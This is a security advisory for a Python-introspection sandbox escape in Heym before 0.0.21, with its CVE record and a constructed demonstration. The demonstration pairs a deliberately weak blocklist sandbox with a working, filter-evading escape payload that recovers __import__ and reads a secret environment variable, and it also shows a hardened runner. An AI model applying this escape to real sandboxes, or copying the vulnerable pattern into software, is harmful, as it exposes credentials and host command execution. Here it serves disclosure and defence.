Heym < 0.0.21 Sandbox Escape via Python Introspection
Heym before 0.0.21 contains a sandbox escape vulnerability in the custom Python tool executor that allows authenticated workflow authors to bypass sandbox restrictions by using object-graph introspection primitives. Attackers can use Python introspection techniques to recover the unrestricted __import__ function, import blocked modules such as os and subprocess, and access inherited backend environment variables containing database credentials and encryption keys to execute arbitrary host commands as the backend service user.
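The mechanism the description names, as an added example that is not Heym's code and makes no claim about how Heym's executor was built or how the upstream fix works: a constructed in-process "sandbox" that strips __import__ from the builtins it hands to exec() and filters blocked names out of the source, the object-graph walk (object.__subclasses__() to a Python-defined class, its __init__.__globals__, the module's real builtins dict, the unrestricted __import__) that recovers os and reads a constructed DEMO_DB_PASSWORD variable, and a runner that executes tool code in a separate interpreter with a scrubbed environment so nothing inherited from the backend is there to leak. The function names, the blocklist, the allowed builtins and the secret are assumptions for illustration.

```python
"""Constructed example (not Heym's code): a blocklist-style in-process Python
"sandbox" of the kind CWE-693 covers, the object-graph introspection that
escapes it, and a runner that does not hand the tool its parent's environment."""
import builtins
import os
import re
import subprocess
import sys

# Constructed secret standing in for a backend credential that the service
# process inherits through its environment.
os.environ["DEMO_DB_PASSWORD"] = "constructed-secret"

# Assumed blocklist: whole-word matches on the usual suspects.
BLOCKED = re.compile(r"\b(?:os|subprocess|sys|builtins|__import__)\b")
# Assumed allowlist of builtins the tool body may use (no __import__, no open).
ALLOWED_BUILTINS = ("len", "range", "str", "dict", "list", "getattr", "isinstance", "print")


def blocklist_rejects(code: str) -> bool:
    """True if the naive source filter would refuse this tool code."""
    return BLOCKED.search(code) is not None


def run_tool_blocklisted(code: str) -> dict:
    """Vulnerable pattern: exec() in the backend process with __import__ removed
    from builtins and a word blocklist on the source. Nothing here is a security
    boundary; the interpreter's object graph is still fully reachable."""
    if blocklist_rejects(code):
        raise ValueError("tool code uses a blocked name")
    safe_builtins = {name: getattr(builtins, name) for name in ALLOWED_BUILTINS}
    result: dict = {}
    exec(code, {"__builtins__": safe_builtins, "result": result})
    return result


# Attacker-authored tool body. It never writes 'os', 'builtins' or '__import__'
# as whole words, so the filter passes it. Every class defined in Python and
# reachable from object.__subclasses__() carries its module's globals on
# __init__, and those globals hold the real builtins, which still contain the
# unrestricted __import__.
ESCAPE_PAYLOAD = """
key = "__buil" + "tins__"
real = None
for cls in ().__class__.__base__.__subclasses__():
    g = getattr(getattr(cls, "__init__", None), "__globals__", None)
    if g is not None and key in g:
        real = g[key]
        break
real = real if isinstance(real, dict) else getattr(real, "__dict__")
imp = real["__imp" + "ort__"]
o_s = imp("o" + "s")
result["leaked"] = o_s.environ.get("DEMO_DB_PASSWORD")
result["module"] = o_s.__name__
"""


def demo_escape() -> dict:
    """Runs the escape payload through the vulnerable runner."""
    return run_tool_blocklisted(ESCAPE_PAYLOAD)


def run_tool_isolated(code: str, timeout: float = 10.0) -> subprocess.CompletedProcess:
    """Hardened direction: a separate interpreter in isolated mode (-I) with a
    scrubbed environment, so backend credentials are never inherited. A child
    process alone is still not a sandbox (same user, same filesystem, same
    network); pair it with OS-level confinement such as a container, seccomp
    or a dedicated unprivileged user."""
    scrubbed_env = {"PATH": "/usr/bin:/bin", "LANG": "C.UTF-8"}  # no secrets
    return subprocess.run(
        [sys.executable, "-I", "-c", code],
        env=scrubbed_env, capture_output=True, text=True, timeout=timeout, check=False,
    )


def demo_isolated() -> str:
    """Same secret lookup with no blocklist at all; the variable simply is not there."""
    probe = "import os; print(repr(os.environ.get('DEMO_DB_PASSWORD')))"
    return run_tool_isolated(probe).stdout.strip()


if __name__ == "__main__":
    print("blocklist stops 'import os':", blocklist_rejects("import os"))
    print("escape result:", demo_escape())
    print("isolated child sees:", demo_isolated())
```

Running it shows the filter stopping a literal `import os` while the payload walks straight to the real builtins and reads the inherited variable; once __import__ is in hand, subprocess is one call away, which is the "arbitrary host commands as the backend service user" part of the advisory. The child process with a scrubbed environment removes the credential exposure but is not by itself a sandbox: it still runs as the same user on the same filesystem, so it needs OS-level confinement around it.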
Problem type
CWE-693: Protection Mechanism Failure
Affected products
heymrun
< 0.0.21 - AFFECTED
32b7e809d987d9b018ec8daa2cdaf48f627f26f1 - UNAFFECTED
References
https://github.com/heymrun/heym/releases/tag/v0.0.21
https://github.com/heymrun/heym/pull/94
https://github.com/heymrun/heym/commit/32b7e809d987d9b018ec8daa2cdaf48f627f26f1
https://www.vulncheck.com/advisories/heym-sandbox-escape-via-python-introspection
GitHub Security Advisories
GHSA-vhhj-j98h-xx8p
https://github.com/advisories/GHSA-vhhj-j98h-xx8p
https://nvd.nist.gov/vuln/detail/CVE-2026-45227
https://github.com/heymrun/heym/pull/94
https://github.com/heymrun/heym/commit/32b7e809d987d9b018ec8daa2cdaf48f627f26f1
https://github.com/heymrun/heym/releases/tag/v0.0.21
https://www.vulncheck.com/advisories/heym-sandbox-escape-via-python-introspection
https://github.com/advisories/GHSA-vhhj-j98h-xx8p
JSON source
https://cveawg.mitre.org/api/cve/CVE-2026-45227
{
"dataType": "CVE_RECORD",
"dataVersion": "5.2",
"cveMetadata": {
"cveId": "CVE-2026-45227",
"assignerOrgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"assignerShortName": "VulnCheck",
"dateUpdated": "2026-05-12T21:18:34.901Z",
"dateReserved": "2026-05-11T14:14:49.611Z",
"datePublished": "2026-05-12T21:18:34.901Z",
"state": "PUBLISHED"
},
"containers": {
"cna": {
"providerMetadata": {
"orgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"shortName": "VulnCheck",
"dateUpdated": "2026-05-12T21:18:34.901Z"
},
"datePublic": "2026-05-09T00:00:00.000Z",
"title": "Heym < 0.0.21 Sandbox Escape via Python Introspection",
"descriptions": [
{
"lang": "en",
"value": "Heym before 0.0.21 contains a sandbox escape vulnerability in the custom Python tool executor that allows authenticated workflow authors to bypass sandbox restrictions by using object-graph introspection primitives. Attackers can use Python introspection techniques to recover the unrestricted __import__ function, import blocked modules such as os and subprocess, and access inherited backend environment variables containing database credentials and encryption keys to execute arbitrary host commands as the backend service user."
}
],
"affected": [
{
"vendor": "heymrun",
"product": "heym",
"repo": "https://github.com/heymrun/heym",
"defaultStatus": "affected",
"versions": [
{
"version": "0",
"status": "affected",
"versionType": "semver",
"lessThan": "0.0.21"
},
{
"version": "32b7e809d987d9b018ec8daa2cdaf48f627f26f1",
"status": "unaffected",
"versionType": "git"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"lang": "en",
"description": "Protection Mechanism Failure",
"cweId": "CWE-693",
"type": "CWE"
}
]
}
],
"references": [
{
"url": "https://github.com/heymrun/heym/releases/tag/v0.0.21",
"tags": [
"release-notes"
]
},
{
"url": "https://github.com/heymrun/heym/pull/94",
"tags": [
"issue-tracking"
]
},
{
"url": "https://github.com/heymrun/heym/commit/32b7e809d987d9b018ec8daa2cdaf48f627f26f1",
"tags": [
"patch"
]
},
{
"url": "https://www.vulncheck.com/advisories/heym-sandbox-escape-via-python-introspection",
"tags": [
"third-party-advisory"
]
}
],
"metrics": [
{
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
},
{
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
],
"cvssV3_1": {
"version": "3.1",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"attackVector": "NETWORK",
"attackComplexity": "LOW",
"privilegesRequired": "LOW",
"userInteraction": "NONE",
"scope": "UNCHANGED",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH"
}
}
],
"credits": [
{
"lang": "en",
"value": "Chia Min Jun Lennon",
"type": "finder"
}
],
"tags": [
"x_open-source"
]
}
}
}